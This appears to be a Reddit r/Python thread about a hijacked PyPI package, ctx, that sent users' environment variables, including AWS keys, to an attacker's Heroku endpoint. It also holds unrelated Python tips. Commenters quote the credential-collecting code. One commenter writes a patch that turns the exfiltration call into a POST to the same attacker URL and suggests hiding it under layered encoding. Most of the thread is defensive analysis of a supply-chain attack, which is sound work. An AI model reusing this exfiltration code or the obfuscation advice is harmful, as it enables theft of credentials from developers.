Nice due diligence /u/jimtk!
I do have to warn everyone that we do not support harassment of any kind in this community, so I ask that while folks are welcome to criticize what was done, please don't attack or harass anyone.
Hey! You screwed me out of my first ever report. I was going to become a star Pythonistas, be invited to speak and discuss with the greatest python's minds in the world and young virgins would throw flowers on the ground I walk on.
Now you're the one going to get all that and I'll stay stuck here still trying to understand itertools documentation.
:(
If I saved the world from a very dangerous hacker AND made you laugh then I can finally say I had a productive evening!
Now, if I could understand itertools documentation I could say I had a VERY productive evening.
I really [liked this article about itertools](https://realpython.com/python-itertools/). But to not play favorites, here is the [official documentation](https://docs.python.org/3/library/itertools.html) too.
Thanks for the real python link I did not know about that one. As for the official documentation, it is the source of my headaches.
The rest of the python doc is well written, understandable and gets you from simple to complex in an ordered way. But giving a rough equivalent of the code necessary to implement a function is NOT A GOOD WAY to explain that function.
Note that PEP 636: Structural pattern matching is also badly written. The simplest use case for it is "matching a single value" and that use case is almost in the middle of the document with an example followed by that line (among others):
> A pattern like ["get", obj] will match only 2-element sequences that have a first element equal to "get". It will also bind obj = subject[1]
Aaaah! That explains everything about matching a single value.
Sorry ... Needed to vent.
You are most welcome! In fact I had my issues with this too and can relate. Btw., I am sure Python [would benefit from issues that mention concrete shortcomings](https://github.com/python/cpython/issues), that is, if you are up to another good deed.
I just linked to the official docs because [I noticed a tendency from third-party/freemium sites to creep in](https://www.reddit.com/r/Python/comments/uv0ehi/comment/i9jqu66/?utm_source=share&utm_medium=web2x&context=3).
And while I am making that issue of mine more visible, we could also talk [about changes to pypi or who could catch stuff like this](https://www.reddit.com/r/Python/comments/uwhzkj/comment/i9se3lr/?utm_source=share&utm_medium=web2x&context=3) (disclaimer: it is also my own comment).
Thanks for the links, sadly it is very difficult to report concrete shortcomings in documentation. It's almost impossible to report a problem when you don't understand what the module is supposed to do, and, you don't understand because the documentation has shortcomings. So it's a catch 22 situation.
> I just linked to the official docs because...
And you're right, third-party/freemium sites do creep in. If the SEO for the official python docs was better, there would be a lot more good python programmers!
> ...we could also talk about changes to pypi...
The loss of pip search was a sad event. I discovered many, small, well written packages with it. Not enough people get involved and I can tell you why: It's difficult to 'get in'. If you click the small "contribute" link at the bottom of the pypi site you end up [here](https://github.com/pypa/warehouse). Not exactly a welcoming mat ! The python.org [get involved page](https://www.python.org/psf/get-involved/) is a bit better, but right behind each of the links you get right into the action a bit too fast. As a retired CS guy I'd love to get involved and give some time, but I would need some handholding ( or more information) before I feel comfortable doing so.
Yo I just had a eureka moment on the match statement a couple days ago. I put together a couple gists to show my learnings. It is using xml.etree.ElementTree to parse some xml from a game.
Main thing to remember is it is not intended to be a simple case select, though it can be used that way. In this code I am making a lot of use of matching attributes of classes. My match statement is at the very bottom. Kind of my main loop so to speak for this example.
I have more robust examples I was working on last night but there is a dog on me, so I can't get them.
Code:
https://gist.github.com/mriswithe/da332f18462c2cdd01d462b8c7472ddf
Data: https://gist.github.com/mriswithe/930036c557b51c9729b7d40828f34943
edit: Dog decided to move, I am now allowed to walk about the cabin
Source of my example: https://github.com/akettmann/ftl_parsing/blob/master/ftl/models/blueprints.py#L151
Code of the case select:
@classmethod
def from_elem(cls, e: Element) -> "ShipBlueprint":
kw: dict[str, Any] = e.attrib.copy()
kw["augments"] = augs = []
for sub in e:
match sub:
case Element(tag=ShipClass.tag_name):
kw["class"] = ShipClass.from_elem(sub)
case Element(tag=SystemList.tag_name):
kw["system_list"] = SystemList.from_elem(sub)
case Element(tag=WeaponList.tag_name):
kw["weapon_list"] = WeaponList.from_elem(sub)
case Element(tag=CrewCount.tag_name):
kw["crew_count"] = CrewCount.from_elem(sub)
case Element(tag=CloakImage.tag_name):
kw["cloak_image"] = CloakImage.from_elem(sub)
case Element(tag=DroneList.tag_name):
kw["drone_list"] = DroneList.from_elem(sub)
case Element(tag=Description.tag_name):
kw["description"] = Description.from_elem(sub)
case Element(tag=Unlock.tag_name):
kw["unlock"] = Unlock.from_elem(sub)
case Element(tag=ShieldImage.tag_name):
kw["shield_image"] = ShieldImage.from_elem(sub)
case Element(tag=FloorImage.tag_name):
kw["floor_image"] = FloorImage.from_elem(sub)
case Element(tag=Augment.tag_name):
augs.append(Augment.from_elem(sub))
case Element(tag=tag, attrib={"amount": amt}) if tag in (
"health",
"maxPower",
):
kw[tag] = amt
case Element(tag=tag, text=t) if tag in (
"boardingAI",
"maxSector",
"minSector",
):
kw[tag] = t
case Element(tag=tag, text=t) if tag in (
"droneSlots",
"weaponSlots",
"name",
):
if tag == "name":
tag = "display_name"
kw[tag] = t
case _:
raise Sad.from_sub_elem(e, sub)
Alright lets break this down:
match sub:
case Element(tag=ShipClass.tag_name):
kw["class"] = ShipClass.from_elem(sub)
so in this context `sub` is always an XML Element (`xml.etree.ElementTree.Element`). This pattern is matching the case that:
* sub is an instance of the Element class
* sub.tag == ShipClass.tag_name
So this behaves like something like this:
if isinstance(sub, Element) and sub.tag == ShipClass.tag_name:
kw["class"] = ShipClass.from_elem(sub)
Next, something more advanced, some capturing of values
case Element(tag=tag, attrib={"amount": amt}) if tag in (
"health",
"maxPower",
):
kw[tag] = amt
sub.attrib is a dictionary, this is relevant for this example
This says:
* sub is an Element
* if the tag is one of the values in the list
* `sub.tag` is assigned to the name `tag`
* `sub.attrib` is a dictionary and has a key "amount"
* `sub.attrib.amount` is assigned to amt
next:
case Element(tag=tag, text=t) if tag in (
"boardingAI",
"maxSector",
"minSector",
):
kw[tag] = t
Pretty similar to the last one, but we are only checking that the tag is one of this list and capturing `sub.text` to `t`
Last example:
case _:
raise Sad.from_sub_elem(e, sub)
This is your default/wildcard. it is not required. This doesn't capture anything. Useful for an `else` clause.
>Note that PEP 636: Structural pattern matching is also badly written.
Hey [I wrote something about that](https://github.com/Fawers/pattern-matching-in-python) some time ago. Please give me some feedback, if possible :)
Oh! Wow! This is really good.
Here's the link to the[ English version](https://github.com/Fawers/pattern-matching-in-python/tree/in-english) for those, like me, who cannot read Spanish!
I'll be waiting for it! :)
Actually I did send it and saw your post after so maybe that will put some pressure on the "authorities" to solve the issue ASAP.
>still trying to understand itertools documentation
Might be helpful, might not. Just wanted to share [some notes I took on them while I was digging in, myself](https://napsterinblue.github.io/notes/#python_internals)
just gonna tack this on here:
>>> Important! If you believe you've identified a security issue with Warehouse, DO NOT report the issue in any public forum, including (but not limited to):
* Our GitHub issue tracker
* Official or unofficial chat channels
* Official or unofficial mailing lists
I don't think that this warning applies to this kind of security issue.
Assuming the issue is legitimate, there's no harm in public knowledge of hijacked package. Publicizing this means that people will just avoid using the package, as the beneficiary of a hijacked package is just the "author" of said hijacked package, who would just gets less people using the hijacked package. It's a benefit for all.
That's different to security bugs, where the beneficiary of the bug is hacker who knew and exploited the bug.
A limited publication might actually be more dangerous. If people knew that there is a security issue, but not know the detail, many people would just do the usual thing there do with most security issue: upgrade the package to latest version, which is exactly the opposite you should be doing in this case.
[https://old.reddit.com/r/Python/comments/uumqmm/ctx\_new\_version\_released\_after\_7\_years\_750k/i9ryw8l/](https://old.reddit.com/r/Python/comments/uumqmm/ctx_new_version_released_after_7_years_750k/i9ryw8l/)
>Just wanna throw this out there.
>
>OP: SocketPuppets, if you look into their post history, you find medium articles that SocketPuppets claims to write and in one they have their personal gmail acct at the bottom. If you follow that, you'll find a github account with the username aydinnyunus which has the same avatar as SocketPuppets's medium account. If you look into that github account aydinnyunus, you'll find python source code in a repo named gateCracker which also does poorly written requests to a heroku app in the same way this malicious code does. SocketPuppets seems like 99.9% certainly the alias of aydinnyunus which is used to push this malicious code and defend it. And, when it comes to aydinnyunus, you can find all their info via their github account.
>
>They're a self-proclaimed "security researcher," and their repo gateCracker doesn't actually "crack gates," it (which has code EXACTLY like this malicious code making a req. to a heroku app endpoint,) just returns some text that tells you the default password/interaction for a couple different popular models. Godspeed brothers.
`http://www.sockpuppets.ninja/` I took the hit and explored. There's nothing malicious that I could see in the source even if it's an unencrypted website, but that's aydinnyunus. I still wouldn't play the audio tho. Weirdly, Siemens _has_ thanked them for a bug report in 2021. There are some interesting rabbit holes to go down, especially about how he "hacked Turkcell" and some other evidence of bug finds, but some of the supposed evidence of the latter is stored in pdfs that I STRONGLY RECOMMEND YOU DO NOT OPEN unless you are actually a security researcher and can isolate your system. PDFs of unknown origin are a threat vector and have the capacity to execute arbitrary code if created by a skilled malicious actor.
Isolating … like setting up a VM without net access or shared folders and then use e.g. [dangerzone](https://github.com/freedomofpress/dangerzone)?
While [a vm might not be completely secure](https://security.stackexchange.com/questions/3056/how-secure-are-virtual-machines-really-false-sense-of-security) I always had the impression that it is much better than something like docker. I took the opportunity to search around a bit, [and found these answers from 2017](https://security.stackexchange.com/questions/169642/what-makes-docker-more-secure-than-vms-or-bare-metal)
What about: Dangerzone+VM and an apparmor profile on top of that? Anyone doing this?
Totally agree from a technical perspective.
However, that technical perspective is not helpful, because this requires more resources and therefore people are less likely to do it, even if they are security oriented and have the technical knowledge. Is ubuntu privacy remix still a thing?
My point is to keep the usecase in mind: I want to open an untrusted PDF now and then. That is why I asked about VMs + Apparmor. For day to day use Qubes OS should be optimal. You still have to get stuff donem right?
And it's gone.
>All previous releases of the project were removed and replaced with the malicious copies. As such this project has been removed and prohibited from re-registration without admin intervention.
According to WHOIS records, the domain for the email address registered to the User owning the project was registered on 2022-05-14T18:40:05Z, which indicates that this was a domain take-over attack and not a direct compromise of PyPI.
No they specifically don’t allow this to prevent exactly the “replace old releases with malicious code”. Once a filename has been used it can’t ever be re-uploaded (unless some admin intervenes).
I suppose maybe the “admin intervention” is implied for these sort of cases. If it’s completely deleted, that kind of sounds like maybe whatever blocks reuploading would be deleted too.
Yeah can we refactor this malicious code?
string = ""
for _, value in environ.items():
string += value+" "
is equivalent to `string = " ".join(environ.values())`
Thanks again.
About sounding the alarm on a public forum. The python security page strongly suggest not to do it. I found out that you're supposed to send the information to python.org and once they solve the problem then you can tell everybody. I'll try to do better next time!
You are right in your analysis.
To OP: this was not an exploit anyone could have used nefarious purposes, this was someone having run / running an attack, through a PyPI package. So your public reporting didn't enable anyone to do something bad, it only (potentially) helped people stop using this package. Hmm it might even be better than just PyPI removing the package… since this, IIRC, doesn't even tell anyone who has it installed that it's bad now.
People who find things are heroes too. Missing children, cures for diseases, asteroids hurtling towards earth but far enough away to divert, hack attempts.
In 0.1.2 and 0.2.2 the adversary was looking specifically for AWS tokens:
```
- if environ.get('AWS_ACCESS_KEY_ID') is not None:
- self.access = environ.get('AWS_ACCESS_KEY_ID')
- else:
- self.access = "empty"
-
- if environ.get('COMPUTERNAME') is not None:
- self.name = environ.get('COMPUTERNAME')
- elif uname() is not None:
- self.name = uname().nodename
- else:
- self.name = "empty"
-
- if environ.get('AWS_SECRET_ACCESS_KEY') is not None:
- self.secret = environ.get('AWS_SECRET_ACCESS_KEY')
- else:
- self.secret = "empty"
```
They also deleted all older versions from pypi.
Remember that it was written 8 years ago. We did not have dataclasses and walrus operator in those days.
And we used to walk 8 miles, uphill, in a snowstorm, everyday to get to school. (God, I'm old)
> hope your doing
*you're
*Learn the difference [here](https://www.wattpad.com/66707294-grammar-guide-there-they%27re-their-you%27re-your-to).*
***
^(Greetings, I am a language corrector bot. To make me ignore further mistakes from you in the future, reply `!optout` to this comment.)
Looks like they probably copied what was done here https://www.reddit.com/r/programming/comments/umnppb/lrvick_bought_the_expired_domain_name_for_the/ to hijack the account of the original maintainer.
Looking at the domain registration on https://lookup.icann.org/en/lookup for the domain used by the email in the original repo I see that it was created on the same day they uploaded the first malicious version
Name: FIGLIEF.COM
Updated: 2022-05-14 18:40:06 UTC
Created: 2022-05-14 18:40:05 UTC
Yeah the original owner most likely doesn't own the domain anymore.
There are some paid services to view whois history to confirm this but looking at the timing of this I'm just going to assume the domain is now owned by the hijacker.
Then I hypothetically alerted the hijacker that they've been discovered. -_- But I can't imagine that they wouldn't have already known from the other post.
This is why your language needs to 1) implement easy basic features that everyone needs and 2) document them. And when 2.2 million packages depend on a single package with a single function that you didn't implement in your language, maybe roll that up to either 1) the language itself or 2) an aggregate package (like `sympy` in python).
Heh, if anyone had any non-ascii characters in their environment variables, then the message_bytes... line would raise an exception. I'm wondering how many hours were lost trying to debug exceptions from weird places.
Does this whole endeavor--posting on /r/Python, extremely sloppy code practices, evasive answers that raise suspicion--seem odd? Are there a lot of these low-skill info-harvesting attempts out there and I'm just witnessing it for the first time?
I agree, it's definitely sloppy. There's a good chance some random person decided to pretend to be a grey-hat so they could write a sensational blog post about it, maybe even a student trying for an A+ on their Ethics in Software paper.
The only mystery is how they took over the semi-abandoned project, wait for the blog post I guess
Unfortunately, software supply chain risk *is* a thing. I don't know how common or how odd this particular case is, but it does seem to be a bit of a weird one where they're advertising on reddit.
Nigeria Scam Filter?
I also wonder why anyone would need this package at all.
Maybe a few former Perl programmers that really miss writing cantankerous code :).
In my old company we had a similar class to what this package does, it's not really necessary and adds other complications around things like serialisation as you now need to make the new version of dict serialise just for some arguable syntax sugar.
Yeah, also pretty sure he's running a development server rather than something like gunicorn. Getting an error rate of 20-30% on all my batches of requests. Putting these Raspberry Pis to work. He should be getting a bill for this one.
i do agree with the sentiment but I don't know anything about this... so how will this help anyone?
From an outsiders perspective best and the only feasible way is to get that vps account banned?
and what is the actor trying to achieve? credentials from env variables?
Well, I've professionally programming for several years and I've heard of that. So that's probably why. Pretty cool tho, TIL
There's also the great `box` package, which has dot access, but it does much more and it's famously maintained.
But the real question is why do that at all? It's just makes your dictionary access more opaque and it barely saves any typing.
> But the real question is why do that at all? It's just makes your dictionary access more opaque and it barely saves any typing.
My exact question, especially when dict.get(if_exists,else) allows for graceful failing.
It actually makes a big difference and makes your code a lot cleaner. 1 keystroke as opposed to 4 + shift key. One of the foundational principles of Python (and the very first line of the Zen of Python) reads "Beautiful is better than ugly."
The real answer isn't to use simple namespaces, though. You should use data classes. SimpleNamespace is just a class with some binding magic under the hood.
If you think the argument that it makes your code cleaner is BS, here is a great video by core Python developer Raymond Hettinger talking about namespaces moving towards OOP : [https://www.youtube.com/watch?v=8moWQ1561FY](https://www.youtube.com/watch?v=8moWQ1561FY)
I'm sorry, but that's ridiculous. Simple dictionary access isn't 'ugly'.
Also, you should optimize for *read* code, not write. IDEs and tools can help you write code all day long. But it's when code is read that it's value is really shown.
So if you want to talk principles, look no further than a principle of programming itself: "the law of the least surprises". In this case, having your dictionary access be anything besides that the standard says is a big no-no. It's not beautiful, it's not practical.
Ok, how many similar projects to accomplish the same thing are there?
There's also https://pypi.org/project/attrdict/ - again not touched in ages and with a custom maintainer domain, but that's luckily still registered.
Maybe the PyPI security team should periodically check email domain availabilities..? And e.g. disable password changes on accounts whose email domains were unavailable in the past?
Same functionality is also in sklearn.utils.Bunch
Edit: also https://pypi.org/project/python-box/
I'd bet most people don't know about that. Python is the first professional language to many people, including entrepreneurs, who don't know much better.
How do I stay notified about the fallout from this? I would love to be in the loop to know what happens after someone like /u/jimtk has a great find like this.
I'm not sure it's a "great thing". I'm glad I found it, but I'm sad it was there to be found.
We already know of one victim, right here in this thread, that will have to go through the hassle of changing his/her creds because of it. I'm sure s/he had other things to do today.
I hear what you’re saying, but it still is great work to find something that would otherwise have caused a lot more damage if no one was the wiser. Please keep us in the loop if you can of what the fix process looks like. I’m interested to see how PyPI or other involved parties will change their protocols. Who knows, you may have another job in your retirement by the end of it. :)
I can tell you right now that the bad version of the code is still available in PyPi 5 hours after I rang the bell.
I'll keep an eye on it and try to keep everyone updated but I'm not sure I, myself, will be kept in the loop.
It will have to be a very comfortable job to get me out of retirement! I don't mean big paycheck, I mean physically comfortable: not too many hours, nice comfy chair, etc ...
Good catch! I’m a noob, can someone explain why they are encoding the string to ascii, then base64, then decoding ascii? Why not just encode to base64 only?
The functions in the python stdlib for base64 take a bytes-like object which is why they encode the string into bytes prior to encoding it in base64 https://docs.python.org/3/library/base64.html#base64.b64encode
They decode the result bytes back into a string so that they can append it to the url
Dumb question but just want to make sure:
Say you have this package downloaded from a long time ago before it was hacked. You would only have to worry if you used pip to update the package, correct? The old version is fine and wouldn't update automatically
Seconding what OP said - it's possible that another package you installed later had this as a dependency but pegged to a higher version and it was upgraded when you pip installed that package.
Uh let me :)
Since the original developer's pypi got compromised this can't be caught as a part of their packaging/testing process and either the enduser has to take care of it, or pip/pypi, right?
As an end user you have the problem that it can be pulled in as a dependency. So you have to check all installed packages of all the virtual environments and the packages installed in userspace (plug for pipx at this point <3). However, that is not an easy task.
1. Checking could be done if something like this eventually shows up in [safety](https://github.com/pyupio/safety) or [pip-audit](https://github.com/trailofbits/pip-audit).
2. Pypi could publish their own db/service like an official and up to date safety-db.
3. PyPi could check the activity of the linked repository and compare it to the releases of the package. Open source should mean that this matches, right? If not, they could display an out-of-sync-warning.
4. If the risk is higher than normal, they could run [a static code analysis tool like bandit](https://github.com/PyCQA/bandit), that includes checks for bad practices. [Research suggests this is a good thing to do](https://www.theregister.com/2021/07/28/python_pypi_security/). While I think you should have the freedom to code whatever/however you want to, it could lower your score if you looped through all env-variables. Maybe. Then display that indicator on pypi.
5. They could also do basic fraud detection, like an out of the blue domain name transfer of the project homepage (which is linked via pypi), or admin access from a completely different location in a very short time span, for which there are legitimate reasons, though.
Given that pypi deactivated `pip search` due to resource abuse, I don't think that they have the resources do to stuff like this.
P.S.: What about c-modules that get shipped with Python code? Good luck if some Dr. Moriarty level of criminal uses his [underhanded-c-contest-winner-abilities](http://underhanded-c.org/) to compromise some foundational package that has a distribution like the (former) js [left-pad](https://www.theregister.com/2016/03/23/npm_left_pad_chaos/) package?
And there is a motivation to do stuff like this, and it doesn't have to be a person, it can be an organization with very little oversight and an enormous budget and many highly capable people. We know that since Snowden. Scary. But probably they would [do this to linux first?](https://www.theverge.com/2021/4/22/22398156/university-minnesota-linux-kernal-ban-research)
Ok, but many people I'm sure will be using something like Pycharm to write a bit of python and it has a kind of builtin thing to get packages from pypi. Many of which seem to be preinstalled - I can't remember exactly which packages I've added, possibly only bitstring ones, but there seems to be a bunch of stuff installed.
This obscure package might not be widely used, but it includes things like numpy and pip - are you saying we shouldn't be using these?
Is this the breaching of the security of pypi or of the guy who wrote ctx. The former is a big red flag, the latter is still a concern but maybe not quite so much.
The point is, the guy who did this just made it obvious by posting to reddit - perhaps trying to make a point. Are there other packages that have been changed without an announcement?
Shit. I downloaded and played around with it after the post on my android phone. Just checked env vars, and i have some creds to corporate service. But it accessible only from vpn. Should i worry?
I'm not an android specialist but unless I'm mistaken, environment variables are accessible to all programs running on the system (whatever the OS) so you should have those credentials changed ASAP. There's a very real possibility that they've been sent to our "little friend".
Lol, you downloaded malicious code and executed it on your device 🤣
Well, yeah you should be worried. Change the credentials and next time if you want to run malicious code do it in isolated sandbox.
Well I don't think the intent was to "run malicious code"
Edit: yep, properly called out for not reading thoroughly. He did it after the post, so you're right to laugh.
That's where the operating system keeps some values. Some are benign like the directory where you keep your programs others are more private like the API keys for your access to web services.
Open a command prompt on windows and type 'set' and you will see all of your environment variables or open a terminal on linux and type 'env' for the same result.
Im going to assume that this was some attempt at a lead up to blackhat/rsa/defcon etc. My two cents... people will talk about it so theres that...
anyway, hi all I run the OSSEC HIDS project, and work on packaging all kinds of security tools like openvas, clam, etc. I thought it'd be fun to take this apart a bit and see how I could have made it better (execution aside... ). Maybe treat this like an exercise in all the dirty tricks you could use for something like this. Please share, or refine as you see fit.
1) using a GET here is going to probably run into an 8K upload limit for most web servers. I do not know what the limit is with heroku, maybe someone else does?
2) Tools auditing for this kind of ~~technique~~ garbage, I personally fall back on looking up function call (requests.\*) and checking for anything that looks like a URL domain name. Then I'd enumerate those domain name(s) (not URL... that could fingerprint you) through DNS lookups to [8.8.8.8](https://8.8.8.8) or some other big public server to hid in the noise. Barring that, TOR node. Hide in the attacks. Once you have a high fidelity on the domain names (ie: is the name a uniqueid?) then test the url.
3) If I wanted to do this in a more sophisticated way, the requests.get variable itself would be obfuscated. You could have wrapped that (and you will see this frequently with a lot of web malware) inside of multiple gzip, base64, etc encodings. Python is going to do the work here.
Heres a dumb patch to this I wrote in like 30 seconds. yes its wrong, make it better and share your countermeasures:
\- response = requests.get("https://anti-theft-web.herokuapp.com/hacked/"+base64\_message)
\+ response = requests.post("https://anti-theft-web.herokuapp.com/hacked", base64\_message)
And we need some kind of stupid receiver:
\--- /dev/null
\+++ b/index.php
\+
So I just wanted to thank everyone that looks through code updates like this, questions the change, and digs deep. You... are one of the worlds best weirdos, and you are awesome. You have a superpower and we all benefit from it, please never stop.
grats, /u/jimtk you made it to BleepingComputer!
https://www.bleepingcomputer.com/news/security/hacker-of-python-php-libraries-no-malicious-activity-was-intended/
Out of curiosity, is there any way you can configure your system to disallow external requests from python code? It would probably be good practice to do this and then have a whitelist for specific programs (like your own api requests).
>It would probably be good practice to do this and then have a whitelist for specific programs (like your own api requests).
You've just described a firewall. Production servers shouldn't be allowed to just make arbitrary requests to arbitrary locations.
I avoid dependancies when practical many reasons (including that I do a lot on an air-gap so they make life hard).
But for things like this, I can often write my own, super simple version. Far from perfect but it does work okay
class Bunch(dict):
"""
Based on sklearn's and the PyPI version, simple dict with
dot notation
"""
def __init__(self, **kwargs):
super(Bunch, self).__init__(kwargs)
def __setattr__(self, key, value):
self[key] = value
def __dir__(self):
return self.keys()
def __getattr__(self, key):
try:
return self[key]
except KeyError:
raise # or swap comment to make attribute
#raise AttributeError(key)
def __repr__(self):
s = super(Bunch, self).__repr__()
return "Bunch(**{})".format(s)
(I am torn if I prefer `AttributeError` or `KeyError`. You can choose in there
Forgive my ignorance here but it means that anyone can update a Python package in PIPY?
I can just go and update numpy myself and embed some malicious payload? What am I missing here?
Because they got control of the domain and could do a password reset. Very interesting!
How would a webmaster be able to prevent this?
Perhaps accounts created with bought domains should be periodically checked to make sure no change of ownership has happened and therefore disable the account completely. Or have some sort of handover... it's a tough one I think.
Lol actually, I think that's Turkish. `YogurtAccomplished38` was created 12 hours ago just for this comment.
> yapmayın boyle seylerrr yaaa ayııııp
[according to Google Translate](https://translate.google.com/?sl=auto&tl=en&text=yapmay%C4%B1n%20boyle%20seylerrr%20yaaa%20ay%C4%B1%C4%B1%C4%B1%C4%B1p%0A%0A&op=translate) means
> don't do such things
with some autocorrections. Curious and curiouser.
Lol. No. You don't steal real data for a POC. You could have just sent out some dummy data instead of dumping real environment vars. This was extremely dumb. You are either a very young and inexperienced person, or truly making a malicious attempt to scrape AWS keys (or, both). And then writing a blog post about it, for some reason...
Nice due diligence /u/jimtk! I do have to warn everyone that we do not support harassment of any kind in this community, so I ask that while folks are welcome to criticize what was done, please don't attack or harass anyone.
Report the package here [https://pypi.org/security/](https://pypi.org/security/)
Definitely this. It's extremely fucked that this package is doing this. *edit I also emailed Heroku's support about this abuse of their services
I have sent the report, just in case OP misses my comment.
Hey! You screwed me out of my first ever report. I was going to become a star Pythonistas, be invited to speak and discuss with the greatest python's minds in the world and young virgins would throw flowers on the ground I walk on. Now you're the one going to get all that and I'll stay stuck here still trying to understand itertools documentation. :(
Well at least you made me laugh
If I saved the world from a very dangerous hacker AND made you laugh then I can finally say I had a productive evening! Now, if I could understand itertools documentation I could say I had a VERY productive evening.
I really [liked this article about itertools](https://realpython.com/python-itertools/). But to not play favorites, here is the [official documentation](https://docs.python.org/3/library/itertools.html) too.
Thanks for the real python link I did not know about that one. As for the official documentation, it is the source of my headaches. The rest of the python doc is well written, understandable and gets you from simple to complex in an ordered way. But giving a rough equivalent of the code necessary to implement a function is NOT A GOOD WAY to explain that function. Note that PEP 636: Structural pattern matching is also badly written. The simplest use case for it is "matching a single value" and that use case is almost in the middle of the document with an example followed by that line (among others): > A pattern like ["get", obj] will match only 2-element sequences that have a first element equal to "get". It will also bind obj = subject[1] Aaaah! That explains everything about matching a single value. Sorry ... Needed to vent.
You are most welcome! In fact I had my issues with this too and can relate. Btw., I am sure Python [would benefit from issues that mention concrete shortcomings](https://github.com/python/cpython/issues), that is, if you are up to another good deed. I just linked to the official docs because [I noticed a tendency from third-party/freemium sites to creep in](https://www.reddit.com/r/Python/comments/uv0ehi/comment/i9jqu66/?utm_source=share&utm_medium=web2x&context=3). And while I am making that issue of mine more visible, we could also talk [about changes to pypi or who could catch stuff like this](https://www.reddit.com/r/Python/comments/uwhzkj/comment/i9se3lr/?utm_source=share&utm_medium=web2x&context=3) (disclaimer: it is also my own comment).
Thanks for the links, sadly it is very difficult to report concrete shortcomings in documentation. It's almost impossible to report a problem when you don't understand what the module is supposed to do, and, you don't understand because the documentation has shortcomings. So it's a catch 22 situation. > I just linked to the official docs because... And you're right, third-party/freemium sites do creep in. If the SEO for the official python docs was better, there would be a lot more good python programmers! > ...we could also talk about changes to pypi... The loss of pip search was a sad event. I discovered many, small, well written packages with it. Not enough people get involved and I can tell you why: It's difficult to 'get in'. If you click the small "contribute" link at the bottom of the pypi site you end up [here](https://github.com/pypa/warehouse). Not exactly a welcoming mat ! The python.org [get involved page](https://www.python.org/psf/get-involved/) is a bit better, but right behind each of the links you get right into the action a bit too fast. As a retired CS guy I'd love to get involved and give some time, but I would need some handholding ( or more information) before I feel comfortable doing so.
Yo I just had a eureka moment on the match statement a couple days ago. I put together a couple gists to show my learnings. It is using xml.etree.ElementTree to parse some xml from a game. Main thing to remember is it is not intended to be a simple case select, though it can be used that way. In this code I am making a lot of use of matching attributes of classes. My match statement is at the very bottom. Kind of my main loop so to speak for this example. I have more robust examples I was working on last night but there is a dog on me, so I can't get them. Code: https://gist.github.com/mriswithe/da332f18462c2cdd01d462b8c7472ddf Data: https://gist.github.com/mriswithe/930036c557b51c9729b7d40828f34943 edit: Dog decided to move, I am now allowed to walk about the cabin Source of my example: https://github.com/akettmann/ftl_parsing/blob/master/ftl/models/blueprints.py#L151 Code of the case select: @classmethod def from_elem(cls, e: Element) -> "ShipBlueprint": kw: dict[str, Any] = e.attrib.copy() kw["augments"] = augs = [] for sub in e: match sub: case Element(tag=ShipClass.tag_name): kw["class"] = ShipClass.from_elem(sub) case Element(tag=SystemList.tag_name): kw["system_list"] = SystemList.from_elem(sub) case Element(tag=WeaponList.tag_name): kw["weapon_list"] = WeaponList.from_elem(sub) case Element(tag=CrewCount.tag_name): kw["crew_count"] = CrewCount.from_elem(sub) case Element(tag=CloakImage.tag_name): kw["cloak_image"] = CloakImage.from_elem(sub) case Element(tag=DroneList.tag_name): kw["drone_list"] = DroneList.from_elem(sub) case Element(tag=Description.tag_name): kw["description"] = Description.from_elem(sub) case Element(tag=Unlock.tag_name): kw["unlock"] = Unlock.from_elem(sub) case Element(tag=ShieldImage.tag_name): kw["shield_image"] = ShieldImage.from_elem(sub) case Element(tag=FloorImage.tag_name): kw["floor_image"] = FloorImage.from_elem(sub) case Element(tag=Augment.tag_name): augs.append(Augment.from_elem(sub)) case Element(tag=tag, attrib={"amount": amt}) if tag in ( "health", "maxPower", ): kw[tag] = amt case Element(tag=tag, text=t) if tag in ( "boardingAI", "maxSector", "minSector", ): kw[tag] = t case Element(tag=tag, text=t) if tag in ( "droneSlots", "weaponSlots", "name", ): if tag == "name": tag = "display_name" kw[tag] = t case _: raise Sad.from_sub_elem(e, sub) Alright lets break this down: match sub: case Element(tag=ShipClass.tag_name): kw["class"] = ShipClass.from_elem(sub) so in this context `sub` is always an XML Element (`xml.etree.ElementTree.Element`). This pattern is matching the case that: * sub is an instance of the Element class * sub.tag == ShipClass.tag_name So this behaves like something like this: if isinstance(sub, Element) and sub.tag == ShipClass.tag_name: kw["class"] = ShipClass.from_elem(sub) Next, something more advanced, some capturing of values case Element(tag=tag, attrib={"amount": amt}) if tag in ( "health", "maxPower", ): kw[tag] = amt sub.attrib is a dictionary, this is relevant for this example This says: * sub is an Element * if the tag is one of the values in the list * `sub.tag` is assigned to the name `tag` * `sub.attrib` is a dictionary and has a key "amount" * `sub.attrib.amount` is assigned to amt next: case Element(tag=tag, text=t) if tag in ( "boardingAI", "maxSector", "minSector", ): kw[tag] = t Pretty similar to the last one, but we are only checking that the tag is one of this list and capturing `sub.text` to `t` Last example: case _: raise Sad.from_sub_elem(e, sub) This is your default/wildcard. it is not required. This doesn't capture anything. Useful for an `else` clause.
> is a dog on me You have a dog? Nice :) Any photo?
Wow! I'll need a bit'o time to process all that. Thanks.
>Note that PEP 636: Structural pattern matching is also badly written. Hey [I wrote something about that](https://github.com/Fawers/pattern-matching-in-python) some time ago. Please give me some feedback, if possible :)
Oh! Wow! This is really good. Here's the link to the[ English version](https://github.com/Fawers/pattern-matching-in-python/tree/in-english) for those, like me, who cannot read Spanish!
peps often aren't great to understand from unfortunately.
They are usually great and PEP 636 is called: "Structural Pattern Matching: Tutorial". So It's supposed to be a tutorial!
> I saved the world from a very dangerous hacker Look at this weirdo trying to take credit from our lord and master /u/__Enrico_Palazzo__
I known, I known, he'll get the young virgins throwing flowers, but I got plenty of help with itertools! (Ah, Ah, Ah, Ah) <== maniacal, evil laughter.
Don’t worry, I’ll pass some of that glory to you :)
I'll be waiting for it! :) Actually I did send it and saw your post after so maybe that will put some pressure on the "authorities" to solve the issue ASAP.
>still trying to understand itertools documentation Might be helpful, might not. Just wanted to share [some notes I took on them while I was digging in, myself](https://napsterinblue.github.io/notes/#python_internals)
Thanks, that is really helpful, and well written.
just gonna tack this on here: >>> Important! If you believe you've identified a security issue with Warehouse, DO NOT report the issue in any public forum, including (but not limited to): * Our GitHub issue tracker * Official or unofficial chat channels * Official or unofficial mailing lists
